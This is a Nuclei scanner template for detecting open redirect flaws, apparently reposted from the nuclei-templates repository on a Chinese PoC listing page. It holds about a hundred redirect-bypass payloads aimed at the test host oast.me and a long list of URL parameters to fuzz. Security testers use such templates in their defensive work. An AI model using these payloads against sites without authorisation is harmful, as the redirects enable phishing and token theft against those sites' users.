open-redirect-bypass: Open Redirect Bypass

PoC代码[已公开]

id: open-redirect-bypass

info:
  name: Open Redirect Bypass
  author: ritikchaddha
  severity: medium
  metadata:
    max-request: 1
  tags: redirect,dast,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      redirect:
        - "{{Hostname}}.oast.me"
        - "//oast.me"
        - '////oast.me'
        - "https:oast.me"
        - '\/\/oast.me/'
        - '/\/oast.me/'
        - "oast。me"
        - "//oast%E3%80%82me"
        - "//oast%00.me"
        - "@oast.me/"
        - '/\{{Hostname}}%40oast.me'
        - "{{Hostname}}@oast.me/"
        - "{{RootURL}}/http://www.oast.me/"
        - "{{RootURL}}?http://www.oast.me/"
        - '%09/oast.me/'
        - '%5C%5Coast.me/%252e%252e%252f'
        - '%5Coast.me'
        - '%5coast.me/%2f%2e%2e'
        - '%5c{{RootURL}}oast.me/%2f%2e%2e'
        - '../oast.me'
        - '.oast.me'
        - '/%5coast.me'
        - '////\;@oast.me'
        - '///oast.me'
        - '///oast.me/%2f%2e%2e'
        - '///oast.me@//'
        - '///{{RootURL}}oast.me/%2f%2e%2e'
        - '//;@oast.me'
        - '//\/oast.me/'
        - '//\@oast.me'
        - '//\oast.me'
        - '//\toast.me/'
        - '//oast.me/%2F..'
        - '//oast.me//'
        - '//%69%6e%74%65%72%61%63%74%2e%73%68'
        - '//oast.me@//'
        - '//oast.me\toast.me/'
        - '//https://oast.me@//'
        - '/<>//oast.me'
        - '/\/\/oast.me/'
        - '/\/oast.me'
        - '/\oast.me'
        - '/oast.me'
        - '/oast.me/%2F..'
        - '/oast.me/'
        - '/oast.me/..;/css'
        - '/https:oast.me'
        - '/{{RootURL}}oast.me/'
        - '/〱oast.me'
        - '/〵oast.me'
        - '/ゝoast.me'
        - '/ーoast.me'
        - '/ｰoast.me'
        - '<>//oast.me'
        - '@oast.me'
        - '@https://oast.me'
        - '\/\/oast.me/'
        - 'oast%E3%80%82me'
        - 'oast.me'
        - 'oast.me/'
        - 'oast.me//'
        - 'oast.me;@'
        - 'https%3a%2f%2foast.me%2f'
        - 'https:%0a%0doast.me'
        - 'https://%0a%0doast.me'
        - 'https://%09/oast.me'
        - 'https://%2f%2f.oast.me/'
        - 'https://%3F.oast.me/'
        - 'https://%5c%5c.oast.me/'
        - 'https://%5coast.me@'
        - 'https://%23.oast.me/'
        - 'https://.oast.me'
        - 'https://////oast.me'
        - 'https:///oast.me'
        - 'https:///oast.me/%2e%2e'
        - 'https:///oast.me/%2f%2e%2e'
        - 'https:///oast.me@oast.me/%2e%2e'
        - 'https:///oast.me@oast.me/%2f%2e%2e'
        - 'https://:80#@oast.me/'
        - 'https://:80?@oast.me/'
        - 'https://:@\@oast.me'
        - 'https://:@oast.me\@oast.me'
        - 'https://;@oast.me'
        - 'https://\toast.me/'
        - 'https://oast.me/oast.me'
        - 'https://oast.me/https://oast.me/'
        - 'https://www.\.oast.me'
        - 'https:/\/\oast.me'
        - 'https:/\oast.me'
        - 'https:/oast.me'
        - 'https:oast.me'
        - '{{RootURL}}oast.me'
        - '〱oast.me'
        - '〵oast.me'
        - 'ゝoast.me'
        - 'ーoast.me'
        - 'ｰoast.me'
        - 'redirect/oast.me'
        - 'cgi-bin/redirect.cgi?oast.me'
        - 'out?oast.me'
        - 'login?to=http://oast.me'
        - '#/oast.me'
        - '%0a/oast.me/'
        - '%0d/oast.me/'
        - '%00/oast.me/'

    fuzzing:
      - part: query
        mode: single
        keys:
          - AuthState
          - URL
          - _url
          - callback
          - checkout
          - checkout_url
          - content
          - continue
          - continueTo
          - counturl
          - data
          - dest
          - dest_url
          - destination
          - dir
          - document
          - domain
          - done
          - download
          - feed
          - file
          - file_name
          - file_url
          - folder
          - folder_url
          - forward
          - from_url
          - go
          - goto
          - host
          - html
          - http
          - https
          - image
          - image_src
          - image_url
          - imageurl
          - img
          - img_url
          - include
          - langTo
          - load_file
          - load_url
          - login_to
          - login_url
          - logout
          - media
          - navigation
          - next
          - next_page
          - open
          - out
          - page
          - page_url
          - pageurl
          - path
          - picture
          - port
          - proxy
          - r
          - r2
          - redir
          - redirect
          - redirectUri
          - redirectUrl
          - redirect_to
          - redirect_uri
          - redirect_url
          - reference
          - referrer
          - req
          - request
          - ret
          - retUrl
          - return
          - returnTo
          - return_path
          - return_to
          - return_url
          - rt
          - rurl
          - show
          - site
          - source
          - src
          - target
          - to
          - u
          - uri
          - url
          - val
          - validate
          - view
          - window
          - back
          - cgi
          - follow
          - home
          - jump
          - link
          - location
          - menu
          - move
          - nav
          - orig_url
          - out_url
          - query
          - auth
          - callback_url
          - confirm_url
          - destination_url
          - domain_url
          - entry
          - exit
          - forward_url
          - go_to
          - goto_url
          - home_url
          - image_link
          - load
          - logout_url
          - nav_to
          - origin
          - page_link
          - redirect_link
          - ref
          - referrer_url
          - return_link
          - return_to_url
          - source_url
          - target_url
          - to_url
          - validate_url
          - DirectTo
          - relay

        fuzz:
          - "{{redirect}}"

      - part: query
        mode: single
        values:
          - "https?://" # Replace HTTP URLs with alternatives
        fuzz:
          - "{{redirect}}"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.me/r/idfD2e/1

      - type: status
        status:
          - 301
          - 302
          - 307
# digest: 4a0a0047304502206a2882c605cac005cc99926e18ebd02dc43c4c31a756c745e7f4dd845ab2cca9022100d7cb3221c7842d7e9356fcd694217518a608885632f2cfd3e2abc52a2f26fad2:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/redirect/open-redirect-bypass.yaml
open-redirect-bypass: Open Redirect Bypass

漏洞描述

PoC代码[已公开]

相关漏洞推荐
